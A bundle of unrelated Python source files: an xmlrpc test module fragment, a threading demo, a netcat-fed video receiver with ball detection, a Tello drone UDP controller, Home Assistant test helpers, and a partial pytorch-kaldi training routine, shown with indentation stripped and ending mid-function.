expected_err = "invalid literal for int() with base 10: 'I am broken'"
self.assertEqual(e.headers.get("x-exception"), expected_err)
self.assertTrue(e.headers.get("x-traceback") is not None)
else:
self.fail('ProtocolError not raised')
class CGIHandlerTestCase(unittest.TestCase):
def setUp(self):
self.cgi = SimpleXMLRPCServer.CGIXMLRPCRequestHandler()
def tearDown(self):
self.cgi = None
def test_cgi_get(self):
os.environ['REQUEST_METHOD'] = 'GET'
# if the method is GET and no request_text is given, it runs handle_get
# get sysout output
tmp = sys.stdout
sys.stdout = open(test_support.TESTFN, "w")
self.cgi.handle_request()
sys.stdout.close()
sys.stdout = tmp
# parse Status header
handle = open(test_support.TESTFN, "r").read()
status = handle.split()[1]
message = ' '.join(handle.split()[2:4])
self.assertEqual(status, '400')
self.assertEqual(message, 'Bad Request')
os.remove(test_support.TESTFN)
os.environ['REQUEST_METHOD'] = ''
def test_cgi_xmlrpc_response(self):
data = """<?xml version='1.0'?>
<methodCall>
<methodName>test_method</methodName>
<params>
<param>
<value><string>foo</string></value>
</param>
<param>
<value><string>bar</string></value>
</param>
</params>
</methodCall>
"""
open("xmldata.txt", "w").write(data)
tmp1 = sys.stdin
tmp2 = sys.stdout
sys.stdin = open("xmldata.txt", "r")
sys.stdout = open(test_support.TESTFN, "w")
self.cgi.handle_request()
sys.stdin.close()
sys.stdout.close()
sys.stdin = tmp1
sys.stdout = tmp2
# will respond exception, if so, our goal is achieved ;)
handle = open(test_support.TESTFN, "r").read()
# start with 44th char so as not to get http header, we just need only xml
self.assertRaises(xmlrpclib.Fault, xmlrpclib.loads, handle[44:])
os.remove("xmldata.txt")
os.remove(test_support.TESTFN)
class FakeSocket:
def __init__(self):
self.data = StringIO.StringIO()
def send(self, buf):
self.data.write(buf)
return len(buf)
def sendall(self, buf):
self.data.write(buf)
def getvalue(self):
return self.data.getvalue()
def makefile(self, x='r', y=-1):
raise RuntimeError
class FakeTransport(xmlrpclib.Transport):
"""A Transport instance that records instead of sending a request.
This class replaces the actual socket used by httplib with a
FakeSocket object that records the request. It doesn't provide a
response.
"""
def make_connection(self, host):
conn = xmlrpclib.Transport.make_connection(self, host)
conn._conn.sock = self.fake_socket = FakeSocket()
return conn
class TransportSubclassTestCase(unittest.TestCase):
def issue_request(self, transport_class):
"""Return an HTTP request made via transport_class."""
transport = transport_class()
proxy = xmlrpclib.ServerProxy("http://example.com/",
transport=transport)
try:
proxy.pow(6, 8)
except RuntimeError:
return transport.fake_socket.getvalue()
return None
def test_custom_user_agent(self):
class TestTransport(FakeTransport):
def send_user_agent(self, conn):
xmlrpclib.Transport.send_user_agent(self, conn)
conn.putheader("X-Test", "test_custom_user_agent")
req = self.issue_request(TestTransport)
self.assert_("X-Test: test_custom_user_agent\r\n" in req)
def test_send_host(self):
class TestTransport(FakeTransport):
def send_host(self, conn, host):
xmlrpclib.Transport.send_host(self, conn, host)
conn.putheader("X-Test", "test_send_host")
req = self.issue_request(TestTransport)
self.assert_("X-Test: test_send_host\r\n" in req)
def test_send_request(self):
class TestTransport(FakeTransport):
def send_request(self, conn, url, body):
xmlrpclib.Transport.send_request(self, conn, url, body)
conn.putheader("X-Test", "test_send_request")
req = self.issue_request(TestTransport)
self.assert_("X-Test: test_send_request\r\n" in req)
def test_send_content(self):
class TestTransport(FakeTransport):
def send_content(self, conn, body):
conn.putheader("X-Test", "test_send_content")
xmlrpclib.Transport.send_content(self, conn, body)
req = self.issue_request(TestTransport)
self.assert_("X-Test: test_send_content\r\n" in req)
def test_main():
xmlrpc_tests = [XMLRPCTestCase, HelperTestCase, DateTimeTestCase,
BinaryTestCase, FaultTestCase, TransportSubclassTestCase]
xmlrpc_tests.append(SimpleServerTestCase)
xmlrpc_tests.append(FailingServerTestCase)
xmlrpc_tests.append(CGIHandlerTestCase)
test_support.run_unittest(*xmlrpc_tests)
if __name__ == "__main__":
test_main()
|
Thread_test.py
|
import threading
import time
class MyThread(threading.Thread):
def __init__(self, target, args):
self.target = target
self.args = args
threading.Thread.__init__(self)
def run(self):
add1(self.args)
# time.sleep(1)
print('Im {}'.format(self.name))
def add1(X):
print('计算结果%d' % (X ** 2))
if __name__ == '__main__':
l1 = []
start_time = time.time()
for i in range(4):
t = MyThread(target=add1, args=i)
l1.append(t)
for i in l1:
i.start()
for i in l1:
i.join()
end_time = time.time()
print('use time {}'.format(end_time - start_time))
|
video.py
|
import subprocess as sp
import os
import cv2
import numpy as np
import threading
import socket
import struct
import io
import config
from video.detection import BallDetector
class VideoPlayer:
def __init__(self, detection):
self.video_port = config.video_port
self.detection = detection
self.subprocesses = []
def start(self):
if not self.detection:
netcat = sp.Popen(('nc', '-l', '-p', str(self.video_port)), stdout=sp.PIPE)
mplayer = sp.Popen(('mplayer', '-noconsolecontrols', '-nolirc' , '-fps', '60',
'-cache', '1024', '-'), stdin=netcat.stdout)
self.subprocesses.append(netcat)
self.subprocesses.append(mplayer)
else:
# This is a flag to get the video thread stop itself
self.finish_stream = False
self.ball_detector = BallDetector()
thr = threading.Thread(target = self.initialize_playback)
thr.start()
def finish(self):
self.finish_stream = True
# Clean up subprocesses, if there are any.
for subprocess in self.subprocesses:
subprocess.kill()
def initialize_playback(self):
'''
video_socket = socket.socket()
video_socket.bind(('0.0.0.0', self.video_port))
video_socket.listen(0)
# Accept a single connection and make a file-like object out of it
connection = video_socket.accept()[0].makefile('rb')
try:
while True:
if self.finish_stream:
break
# Read the length of the image as a 32-bit unsigned int. If the
# length is zero, quit the loop
image_len = struct.unpack('<L', connection.read(struct.calcsize('<L')))[0]
if not image_len:
break
# Construct a stream to hold the image data and read the image
# data from the connection
image_stream = io.BytesIO()
image_stream.write(connection.read(image_len))
# Rewind the stream, open it as an image with opencv and do some
# processing on it
image_stream.seek(0)
data = np.fromstring(image_stream.getvalue(), dtype=np.uint8)
imagedisp = cv2.imdecode(data, 1)
if self.detection_switch:
imagedisp = self.ball_detector.process_frame(imagedisp)
cv2.imshow("Frame", imagedisp)
print('okk')
finally:
connection.close()
video_socket.close()
'''
netcat = sp.Popen(('nc', '-l', '-p', str(self.video_port)), stdout=sp.PIPE)
command = [ 'ffmpeg',
'-i', '-', # fifo is the named pipe
'-pix_fmt', 'bgr24', # opencv requires bgr24 pixel format.
'-vcodec', 'rawvideo',
'-an','-sn', # we want to disable audio processing (there is no audio)
'-f', 'image2pipe', '-']
ffmpeg = sp.Popen(command, stdin=netcat.stdout , stdout=sp.PIPE, bufsize=10**4)
self.subprocesses.append(netcat)
self.subprocesses.append(ffmpeg)
while True:
if self.finish_stream:
break
# Capture frame-by-frame
raw_image = ffmpeg.stdout.read(640*480*3)
# transform the byte read into a np array
image = np.fromstring(raw_image, dtype='uint8')
# Notice how height is specified first and then width
image = image.reshape((480,640,3))
if image is not None:
image = self.ball_detector.process_frame(image)
cv2.imshow('Video', image)
ffmpeg.stdout.flush()
cv2.destroyAllWindows()
'''
netcat = sp.Popen(('nc', '-l', '-p', str(self.video_port)), stdout=sp.PIPE)
#ffmpegCmd = ['ffmpeg', '-i', '-', '-f', 'rawvideo', '-vcodec', 'bmp', '-vf', 'fps=40', '-']
#ffmpegCmd = ['ffmpeg', '-i', '-', '-f', 'rawvideo', '-vcodec', 'bmp', '-']
ffmpegCmd = ['ffmpeg', '-thread_queue_size', '0','-i', '-', '-f', 'rawvideo', '-vcodec', 'bmp', '-']
ffmpeg = sp.Popen(ffmpegCmd, stdin = netcat.stdout, stdout = sp.PIPE)
self.subprocesses.append(netcat)
self.subprocesses.append(ffmpeg)
while True:
fileSizeBytes = ffmpeg.stdout.read(6)
fileSize = 0
for i in range(4):
fileSize += fileSizeBytes[i + 2] * 256 ** i
bmpData = fileSizeBytes + ffmpeg.stdout.read(fileSize - 6)
image = cv2.imdecode(np.fromstring(bmpData, dtype = np.uint8), 1)
cv2.imshow('Frame', image)
'''
|
keyboardCommand.py
|
#
# Tello Python3 Control Demo
#
# http://www.ryzerobotics.com/
#
# 1/1/2018
import threading
import socket
import sys
import time
host = ''
port = 9000
locaddr = (host,port)
# Create a UDP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
tello_address = ('192.168.10.1', 8889)
sock.bind(locaddr)
def recv():
count = 0
while True:
try:
data, server = sock.recvfrom(1518)
print(data.decode(encoding="utf-8"))
except Exception:
print ('\nExit . . .\n')
break
print ('\r\n\r\nTello Python3 Demo.\r\n')
print ('Tello: command takeoff land flip forward back left right \r\n up down cw ccw speed speed?\r\n')
print ('end -- quit demo.\r\n')
#recvThread create
recvThread = threading.Thread(target=recv)
recvThread.start()
while True:
try:
msg = input("");
if not msg:
break
if 'end' in msg:
print ('...')
sock.close()
break
# Send data
msg = msg.encode(encoding="utf-8")
sent = sock.sendto(msg, tello_address)
except KeyboardInterrupt:
print ('\n . . .\n')
sock.close()
break
|
common.py
|
"""Test the helper method for writing tests."""
import asyncio
import os
import sys
from datetime import timedelta
from unittest.mock import patch, MagicMock
from io import StringIO
import logging
import threading
from contextlib import contextmanager
from aiohttp import web
from homeassistant import core as ha, loader
from homeassistant.bootstrap import (
setup_component, async_prepare_setup_component)
from homeassistant.helpers.entity import ToggleEntity
from homeassistant.util.unit_system import METRIC_SYSTEM
import homeassistant.util.dt as date_util
import homeassistant.util.yaml as yaml
from homeassistant.const import (
STATE_ON, STATE_OFF, DEVICE_DEFAULT_NAME, EVENT_TIME_CHANGED,
EVENT_STATE_CHANGED, EVENT_PLATFORM_DISCOVERED, ATTR_SERVICE,
ATTR_DISCOVERED, SERVER_PORT)
from homeassistant.components import sun, mqtt
from homeassistant.components.http.auth import auth_middleware
from homeassistant.components.http.const import (
KEY_USE_X_FORWARDED_FOR, KEY_BANS_ENABLED, KEY_TRUSTED_NETWORKS)
_TEST_INSTANCE_PORT = SERVER_PORT
_LOGGER = logging.getLogger(__name__)
def get_test_config_dir(*add_path):
"""Return a path to a test config dir."""
return os.path.join(os.path.dirname(__file__), 'testing_config', *add_path)
def get_test_home_assistant():
"""Return a Home Assistant object pointing at test config directory."""
if sys.platform == "win32":
loop = asyncio.ProactorEventLoop()
else:
loop = asyncio.new_event_loop()
hass = loop.run_until_complete(async_test_home_assistant(loop))
# FIXME should not be a daemon. Means hass.stop() not called in teardown
stop_event = threading.Event()
def run_loop():
"""Run event loop."""
# pylint: disable=protected-access
loop._thread_ident = threading.get_ident()
loop.run_forever()
loop.close()
stop_event.set()
threading.Thread(name="LoopThread", target=run_loop, daemon=True).start()
orig_start = hass.start
orig_stop = hass.stop
@patch.object(hass.loop, 'run_forever')
@patch.object(hass.loop, 'close')
def start_hass(*mocks):
"""Helper to start hass."""
orig_start()
hass.block_till_done()
def stop_hass():
"""Stop hass."""
orig_stop()
stop_event.wait()
hass.start = start_hass
hass.stop = stop_hass
return hass
# pylint: disable=protected-access
@asyncio.coroutine
def async_test_home_assistant(loop):
"""Return a Home Assistant object pointing at test config dir."""
loop._thread_ident = threading.get_ident()
hass = ha.HomeAssistant(loop)
hass.async_track_tasks()
hass.config.location_name = 'test home'
hass.config.config_dir = get_test_config_dir()
hass.config.latitude = 32.87336
hass.config.longitude = -117.22743
hass.config.elevation = 0
hass.config.time_zone = date_util.get_time_zone('US/Pacific')
hass.config.units = METRIC_SYSTEM
hass.config.skip_pip = True
if 'custom_components.test' not in loader.AVAILABLE_COMPONENTS:
yield from loop.run_in_executor(None, loader.prepare, hass)
hass.state = ha.CoreState.running
# Mock async_start
orig_start = hass.async_start
@asyncio.coroutine
def mock_async_start():
"""Start the mocking."""
with patch.object(loop, 'add_signal_handler'), \
patch('homeassistant.core._async_create_timer'):
yield from orig_start()
hass.async_start = mock_async_start
return hass
def get_test_instance_port():
"""Return unused port for running test instance.
The socket that holds the default port does not get released when we stop
HA in a different test case. Until I have figured out what is going on,
let's run each test on a different port.
"""
global _TEST_INSTANCE_PORT
_TEST_INSTANCE_PORT += 1
return _TEST_INSTANCE_PORT
def mock_service(hass, domain, service):
"""Setup a fake service.
Return a list that logs all calls to fake service.
"""
calls = []
# pylint: disable=redefined-outer-name
@ha.callback
def mock_service(call):
""""Mocked service call."""
calls.append(call)
# pylint: disable=unnecessary-lambda
hass.services.register(domain, service, mock_service)
return calls
def fire_mqtt_message(hass, topic, payload, qos=0):
"""Fire the MQTT message."""
hass.bus.fire(mqtt.EVENT_MQTT_MESSAGE_RECEIVED, {
mqtt.ATTR_TOPIC: topic,
mqtt.ATTR_PAYLOAD: payload,
mqtt.ATTR_QOS: qos,
})
def fire_time_changed(hass, time):
"""Fire a time changes event."""
hass.bus.fire(EVENT_TIME_CHANGED, {'now': time})
def fire_service_discovered(hass, service, info):
"""Fire the MQTT message."""
hass.bus.fire(EVENT_PLATFORM_DISCOVERED, {
ATTR_SERVICE: service,
ATTR_DISCOVERED: info
})
def ensure_sun_risen(hass):
"""Trigger sun to rise if below horizon."""
if sun.is_on(hass):
return
fire_time_changed(hass, sun.next_rising_utc(hass) + timedelta(seconds=10))
def ensure_sun_set(hass):
"""Trigger sun to set if above horizon."""
if not sun.is_on(hass):
return
fire_time_changed(hass, sun.next_setting_utc(hass) + timedelta(seconds=10))
def load_fixture(filename):
"""Helper to load a fixture."""
path = os.path.join(os.path.dirname(__file__), 'fixtures', filename)
with open(path) as fptr:
return fptr.read()
def mock_state_change_event(hass, new_state, old_state=None):
"""Mock state change envent."""
event_data = {
'entity_id': new_state.entity_id,
'new_state': new_state,
}
if old_state:
event_data['old_state'] = old_state
hass.bus.fire(EVENT_STATE_CHANGED, event_data)
def mock_http_component(hass):
"""Mock the HTTP component."""
hass.http = MagicMock()
hass.config.components.append('http')
hass.http.views = {}
def mock_register_view(view):
"""Store registered view."""
if isinstance(view, type):
# Instantiate the view, if needed
view = view()
hass.http.views[view.name] = view
hass.http.register_view = mock_register_view
def mock_http_component_app(hass, api_password=None):
"""Create an aiohttp.web.Application instance for testing."""
hass.http = MagicMock(api_password=api_password)
app = web.Application(middlewares=[auth_middleware], loop=hass.loop)
app['hass'] = hass
app[KEY_USE_X_FORWARDED_FOR] = False
app[KEY_BANS_ENABLED] = False
app[KEY_TRUSTED_NETWORKS] = []
return app
def mock_mqtt_component(hass):
"""Mock the MQTT component."""
with patch('homeassistant.components.mqtt.MQTT') as mock_mqtt:
setup_component(hass, mqtt.DOMAIN, {
mqtt.DOMAIN: {
mqtt.CONF_BROKER: 'mock-broker',
}
})
return mock_mqtt
class MockModule(object):
"""Representation of a fake module."""
# pylint: disable=invalid-name
def __init__(self, domain=None, dependencies=None, setup=None,
requirements=None, config_schema=None, platform_schema=None,
async_setup=None):
"""Initialize the mock module."""
self.DOMAIN = domain
self.DEPENDENCIES = dependencies or []
self.REQUIREMENTS = requirements or []
self._setup = setup
if config_schema is not None:
self.CONFIG_SCHEMA = config_schema
if platform_schema is not None:
self.PLATFORM_SCHEMA = platform_schema
if async_setup is not None:
self.async_setup = async_setup
def setup(self, hass, config):
"""Setup the component.
We always define this mock because MagicMock setups will be seen by the
executor as a coroutine, raising an exception.
"""
if self._setup is not None:
return self._setup(hass, config)
return True
class MockPlatform(object):
"""Provide a fake platform."""
# pylint: disable=invalid-name
def __init__(self, setup_platform=None, dependencies=None,
platform_schema=None):
"""Initialize the platform."""
self.DEPENDENCIES = dependencies or []
self._setup_platform = setup_platform
if platform_schema is not None:
self.PLATFORM_SCHEMA = platform_schema
def setup_platform(self, hass, config, add_devices, discovery_info=None):
"""Setup the platform."""
if self._setup_platform is not None:
self._setup_platform(hass, config, add_devices, discovery_info)
class MockToggleDevice(ToggleEntity):
"""Provide a mock toggle device."""
def __init__(self, name, state):
"""Initialize the mock device."""
self._name = name or DEVICE_DEFAULT_NAME
self._state = state
self.calls = []
@property
def name(self):
"""Return the name of the device if any."""
self.calls.append(('name', {}))
return self._name
@property
def state(self):
"""Return the name of the device if any."""
self.calls.append(('state', {}))
return self._state
@property
def is_on(self):
"""Return true if device is on."""
self.calls.append(('is_on', {}))
return self._state == STATE_ON
def turn_on(self, **kwargs):
"""Turn the device on."""
self.calls.append(('turn_on', kwargs))
self._state = STATE_ON
def turn_off(self, **kwargs):
"""Turn the device off."""
self.calls.append(('turn_off', kwargs))
self._state = STATE_OFF
def last_call(self, method=None):
"""Return the last call."""
if not self.calls:
return None
elif method is None:
return self.calls[-1]
else:
try:
return next(call for call in reversed(self.calls)
if call[0] == method)
except StopIteration:
return None
def patch_yaml_files(files_dict, endswith=True):
"""Patch load_yaml with a dictionary of yaml files."""
# match using endswith, start search with longest string
matchlist = sorted(list(files_dict.keys()), key=len) if endswith else []
def mock_open_f(fname, **_):
"""Mock open() in the yaml module, used by load_yaml."""
# Return the mocked file on full match
if fname in files_dict:
_LOGGER.debug('patch_yaml_files match %s', fname)
res = StringIO(files_dict[fname])
setattr(res, 'name', fname)
return res
# Match using endswith
for ends in matchlist:
if fname.endswith(ends):
_LOGGER.debug('patch_yaml_files end match %s: %s', ends, fname)
res = StringIO(files_dict[ends])
setattr(res, 'name', fname)
return res
# Fallback for hass.components (i.e. services.yaml)
if 'homeassistant/components' in fname:
_LOGGER.debug('patch_yaml_files using real file: %s', fname)
return open(fname, encoding='utf-8')
# Not found
raise FileNotFoundError('File not found: {}'.format(fname))
return patch.object(yaml, 'open', mock_open_f, create=True)
def mock_coro(return_value=None):
"""Helper method to return a coro that returns a value."""
@asyncio.coroutine
def coro():
"""Fake coroutine."""
return return_value
return coro
@contextmanager
def assert_setup_component(count, domain=None):
"""Collect valid configuration from setup_component.
- count: The amount of valid platforms that should be setup
- domain: The domain to count is optional. It can be automatically
determined most of the time
Use as a context manager aroung bootstrap.setup_component
with assert_setup_component(0) as result_config:
setup_component(hass, domain, start_config)
# using result_config is optional
"""
config = {}
@asyncio.coroutine
def mock_psc(hass, config_input, domain):
"""Mock the prepare_setup_component to capture config."""
res = yield from async_prepare_setup_component(
hass, config_input, domain)
config[domain] = None if res is None else res.get(domain)
_LOGGER.debug('Configuration for %s, Validated: %s, Original %s',
domain, config[domain], config_input.get(domain))
return res
assert isinstance(config, dict)
with patch('homeassistant.bootstrap.async_prepare_setup_component',
mock_psc):
yield config
if domain is None:
assert len(config) == 1, ('assert_setup_component requires DOMAIN: {}'
.format(list(config.keys())))
domain = list(config.keys())[0]
res = config.get(domain)
res_len = 0 if res is None else len(res)
assert res_len == count, 'setup_component failed, expected {} got {}: {}' \
.format(count, res_len, res)
|
core.py
|
##########################################################
# pytorch-kaldi v.0.1
# Mirco Ravanelli, Titouan Parcollet
# Mila, University of Montreal
# October 2018
##########################################################
import sys
import configparser
import os
from utils import is_sequential_dict, model_init, optimizer_init, forward_model, progress
from data_io import load_counts
import numpy as np
import random
import torch
from distutils.util import strtobool
import time
import threading
import torch
from data_io import read_lab_fea, open_or_fd, write_mat
from utils import shift
from prettytable import PrettyTable
# from torchsummary import summary
def read_next_chunk_into_shared_list_with_subprocess(
read_lab_fea, shared_list, cfg_file, is_production, output_folder, wait_for_process
):
p = threading.Thread(target=read_lab_fea, args=(cfg_file, is_production, shared_list, output_folder))
p.start()
if wait_for_process:
p.join()
return None
else:
return p
def extract_data_from_shared_list(shared_list):
data_name = shared_list[0]
data_end_index_fea = shared_list[1]
data_end_index_lab = shared_list[2]
fea_dict = shared_list[3]
lab_dict = shared_list[4]
arch_dict = shared_list[5]
data_set = shared_list[6]
return data_name, data_end_index_fea, data_end_index_lab, fea_dict, lab_dict, arch_dict, data_set
def convert_numpy_to_torch(data_set_dict, save_gpumem, use_cuda):
if not (save_gpumem) and use_cuda:
data_set_inp = torch.from_numpy(data_set_dict["input"]).float().cuda()
data_set_ref = torch.from_numpy(data_set_dict["ref"]).float().cuda()
else:
data_set_inp = torch.from_numpy(data_set_dict["input"]).float()
data_set_ref = torch.from_numpy(data_set_dict["ref"]).float()
data_set_ref = data_set_ref.view((data_set_ref.shape[0], 1))
return data_set_inp, data_set_ref
def run_nn_refac01(
data_name, data_set, data_end_index, fea_dict, lab_dict, arch_dict, cfg_file, processed_first, next_config_file
):
def _read_chunk_specific_config(cfg_file):
if not (os.path.exists(cfg_file)):
sys.stderr.write("ERROR: The config file %s does not exist!\n" % (cfg_file))
sys.exit(0)
else:
config = configparser.ConfigParser()
config.read(cfg_file)
return config
def _get_batch_size_from_config(config, to_do):
if to_do == "train":
batch_size = int(config["batches"]["batch_size_train"])
elif to_do == "valid":
batch_size = int(config["batches"]["batch_size_valid"])
elif to_do == "forward":
batch_size = 1
return batch_size
def _initialize_random_seed(config):
seed = int(config["exp"]["seed"])
torch.manual_seed(seed)
random.seed(seed)
np.random.seed(seed)
def _load_model_and_optimizer(fea_dict, model, config, arch_dict, use_cuda, multi_gpu, to_do):
inp_out_dict = fea_dict
nns, costs = model_init(inp_out_dict, model, config, arch_dict, use_cuda, multi_gpu, to_do)
optimizers = optimizer_init(nns, config, arch_dict)
for net in nns.keys():
pt_file_arch = config[arch_dict[net][0]]["arch_pretrain_file"]
if pt_file_arch != "none":
if use_cuda:
checkpoint_load = torch.load(pt_file_arch)
else:
checkpoint_load = torch.load(pt_file_arch, map_location="cpu")
nns[net].load_state_dict(checkpoint_load["model_par"])
if net in optimizers:
optimizers[net].load_state_dict(checkpoint_load["optimizer_par"])
optimizers[net].param_groups[0]["lr"] = float(
config[arch_dict[net][0]]["arch_lr"]
) # loading lr of the cfg file for pt
if multi_gpu:
nns[net] = torch.nn.DataParallel(nns[net])
return nns, costs, optimizers, inp_out_dict
def _open_forward_output_files_and_get_file_handles(forward_outs, require_decodings, info_file, output_folder):
post_file = {}
for out_id in range(len(forward_outs)):
if require_decodings[out_id]:
out_file = info_file.replace(".info", "_" + forward_outs[out_id] + "_to_decode.ark")
else:
out_file = info_file.replace(".info", "_" + forward_outs[out_id] + ".ark")
post_file[forward_outs[out_id]] = open_or_fd(out_file, output_folder, "wb")
return post_file
def _get_batch_config(data_set_input, seq_model, to_do, data_name, batch_size):
N_snt = None
N_ex_tr = None
N_batches = None
if seq_model or to_do == "forward":
N_snt = len(data_name)
N_batches = int(N_snt / batch_size)
else:
N_ex_tr = data_set_input.shape[0]
N_batches = int(N_ex_tr / batch_size)
return N_snt, N_ex_tr, N_batches
def _prepare_input(
snt_index,
batch_size,
inp_dim,
ref_dim,
beg_snt_fea,
beg_snt_lab,
data_end_index_fea,
data_end_index_lab,
beg_batch,
end_batch,
seq_model,
arr_snt_len_fea,
arr_snt_len_lab,
data_set_inp,
data_set_ref,
use_cuda,
):
def _zero_padding(
inp,
ref,
max_len_fea,
max_len_lab,
data_end_index_fea,
data_end_index_lab,
data_set_inp,
data_set_ref,
beg_snt_fea,
beg_snt_lab,
snt_index,
k,
):
def _input_and_ref_have_same_time_dimension(N_zeros_fea, N_zeros_lab):
if N_zeros_fea == N_zeros_lab:
return True
return False
snt_len_fea = data_end_index_fea[snt_index] - beg_snt_fea
snt_len_lab = data_end_index_lab[snt_index] - beg_snt_lab
N_zeros_fea = max_len_fea - snt_len_fea
N_zeros_lab = max_len_lab - snt_len_lab
if _input_and_ref_have_same_time_dimension(N_zeros_fea, N_zeros_lab):
N_zeros_fea_left = random.randint(0, N_zeros_fea)
N_zeros_lab_left = N_zeros_fea_left
else:
N_zeros_fea_left = 0
N_zeros_lab_left = 0
inp[N_zeros_fea_left : N_zeros_fea_left + snt_len_fea, k, :] = data_set_inp[
beg_snt_fea : beg_snt_fea + snt_len_fea, :
]
ref[N_zeros_lab_left : N_zeros_lab_left + snt_len_lab, k, :] = data_set_ref[
beg_snt_lab : beg_snt_lab + snt_len_lab, :
]
return inp, ref, snt_len_fea, snt_len_lab
if len(data_set_ref.shape) == 1:
data_set_ref = data_set_ref.shape.view((data_set_ref.shape[0], 1))
max_len = 0
if seq_model:
max_len_fea = int(max(arr_snt_len_fea[snt_index : snt_index + batch_size]))
max_len_lab = int(max(arr_snt_len_lab[snt_index : snt_index + batch_size]))
inp = torch.zeros(max_len_fea, batch_size, inp_dim).contiguous()
ref = torch.zeros(max_len_lab, batch_size, ref_dim).contiguous()
for k in range(batch_size):
inp, ref, snt_len_fea, snt_len_lab = _zero_padding(
inp,
ref,
max_len_fea,
max_len_lab,
data_end_index_fea,
data_end_index_lab,
data_set_inp,
data_set_ref,
beg_snt_fea,
beg_snt_lab,
snt_index,
k,
)
beg_snt_fea = data_end_index_fea[snt_index]
beg_snt_lab = data_end_index_lab[snt_index]
snt_index = snt_index + 1
else:
if to_do != "forward":
inp = data_set[beg_batch:end_batch, :].contiguous()
else:
snt_len_fea = data_end_index_fea[snt_index] - beg_snt_fea
snt_len_lab = data_end_index_lab[snt_index] - beg_snt_lab
inp = data_set_inp[beg_snt_fea : beg_snt_fea + snt_len_fea, :].contiguous()
ref = data_set_ref[beg_snt_lab : beg_snt_lab + snt_len_lab, :].contiguous()
beg_snt_fea = data_end_index_fea[snt_index]
beg_snt_lab = data_end_index_lab[snt_index]
snt_index = snt_index + 1
if use_cuda:
inp = inp.cuda()
ref = ref.cuda()
return inp, ref, max_len_fea, max_len_lab, snt_len_fea, snt_len_lab, beg_snt_fea, beg_snt_lab, snt_index
def _optimization_step(optimizers, outs_dict, config, arch_dict):
for opt in optimizers.keys():
optimizers[opt].zero_grad()
outs_dict["loss_final"].backward()
for opt in optimizers.keys():
if not (strtobool(config[arch_dict[opt][0]]["arch_freeze"])):
optimizers[opt].step()
def _update_progress_bar(to_do, i, N_batches, loss_sum):
if to_do == "train":
status_string = (
"Training | (Batch "
+ str(i + 1)
+ "/"
+ str(N_batches)
+ ")"
+ " | L:"
+ str(round(loss_sum.cpu().item() / (i + 1), 3))
)
if i == N_batches - 1:
status_string = "Training | (Batch " + str(i + 1) + "/" + str(N_batches) + ")"
if to_do == "valid":
status_string = "Validating | (Batch " + str(i + 1) + "/" + str(N_batches) + ")"
if to_do == "forward":
status_string = "Forwarding | (Batch " + str(i + 1) + "/" + str(N_batches) + ")"
progress(i, N_batches, status=status_string)
def _write_info_file(info_file, to_do, loss_tot, err_tot, elapsed_time_chunk):
with open(info_file, "w") as text_file:
text_file.write("[results]\n")
if to_do != "forward":
text_file.write("loss=%s\n" % loss_tot.cpu().numpy())
text_file.write("err=%s\n" % err_tot.cpu().numpy())
text_file.write("elapsed_time_chunk=%f\n" % elapsed_time_chunk)
text_file.close()
def _save_model(to_do, nns, multi_gpu, optimizers, info_file, arch_dict):
if to_do == "train":
for net in nns.keys():
checkpoint = {}
if multi_gpu:
checkpoint["model_par"] = nns[net].module.state_dict()
else:
checkpoint["model_par"] = nns[net].state_dict()
if net in optimizers:
checkpoint["optimizer_par"] = optimizers[net].state_dict()
else:
checkpoint["optimizer_par"] = dict()
out_file = info_file.replace(".info", "_" + arch_dict[net][0] + ".pkl")
torch.save(checkpoint, out_file)
def _get_dim_from_data_set(data_set_inp, data_set_ref):
inp_dim = data_set_inp.shape[1]
ref_dim = 1
if len(data_set_ref.shape) > 1:
ref_dim = data_set_ref.shape[1]
return inp_dim, ref_dim
from data_io import read_lab_fea_refac01 as read_lab_fea
from utils import forward_model_refac01 as forward_model
config = _read_chunk_specific_config(cfg_file)
_initialize_random_seed(config)
output_folder = config["exp"]["out_folder"]
use_cuda = strtobool(config["exp"]["use_cuda"])
multi_gpu = strtobool(config["exp"]["multi_gpu"])
to_do = config["exp"]["to_do"]
info_file = config["exp"]["out_info"]
model = config["model"]["model"].split("\n")
forward_outs = config["forward"]["forward_out"].split(",")
forward_normalize_post = list(map(strtobool, config["forward"]["normalize_posteriors"].split(",")))
forward_count_files = config["forward"]["normalize_with_counts_from"].split(",")
require_decodings = list(map(strtobool, config["forward"]["require_decoding"].split(",")))
save_gpumem = strtobool(config["exp"]["save_gpumem"])
is_production = strtobool(config["exp"]["production"])
batch_size = _get_batch_size_from_config(config, to_do)
if processed_first:
shared_list = list()
p = read_next_chunk_into_shared_list_with_subprocess(
read_lab_fea, shared_list, cfg_file, is_production, output_folder, wait_for_process=True
)
data_name, data_end_index_fea, data_end_index_lab, fea_dict, lab_dict, arch_dict, data_set_dict = extract_data_from_shared_list(
shared_list
)
data_set_inp, data_set_ref = convert_numpy_to_torch(data_set_dict, save_gpumem, use_cuda)
else:
data_set_inp = data_set["input"]
data_set_ref = data_set["ref"]
data_end_index_fea = data_end_index["fea"]
data_end_index_lab = data_end_index["lab"]
shared_list = list()
data_loading_process = None
if not next_config_file is None:
data_loading_process = read_next_chunk_into_shared_list_with_subprocess(
read_lab_fea, shared_list, next_config_file, is_production, output_folder, wait_for_process=False
)
nns, costs, optimizers, inp_out_dict = _load_model_and_optimizer(
fea_dict, model, config, arch_dict, use_cuda, multi_gpu, to_do
)
if to_do == "forward":
post_file = _open_forward_output_files_and_get_file_handles(
forward_outs, require_decodings, info_file, output_folder
)
seq_model = is_sequential_dict(config, arch_dict)
N_snt, N_ex_tr, N_batches = _get_batch_config(data_set_inp, seq_model, to_do, data_name, batch_size)
beg_batch = 0
end_batch = batch_size
snt_index = 0
beg_snt_fea = 0
beg_snt_lab = 0
arr_snt_len_fea = shift(shift(data_end_index_fea, -1, 0) - data_end_index_fea, 1, 0)
arr_snt_len_lab = shift(shift(data_end_index_lab, -1, 0) - data_end_index_lab, 1, 0)
arr_snt_len_fea[0] = data_end_index_fea[0]
arr_snt_len_lab[0] = data_end_index_lab[0]
data_set_inp_dim, data_set_ref_dim = _get_dim_from_data_set(data_set_inp, data_set_ref)
inp_dim = data_set_inp_dim + data_set_ref_dim
loss_sum = 0
err_sum = 0
start_time = time.time()
for i in range(N_batches):
inp, ref, max_len_fea, max_len_lab, snt_len_fea, snt_len_lab, beg_snt_fea, beg_snt_lab, snt_index = _prepare_input(
snt_index,
batch_size,
data_set_inp_dim,
data_set_ref_dim,
beg_snt_fea,
beg_snt_lab,
data_end_index_fea,
data_end_index_lab,
beg_batch,
end_batch,
seq_model,
arr_snt_len_fea,
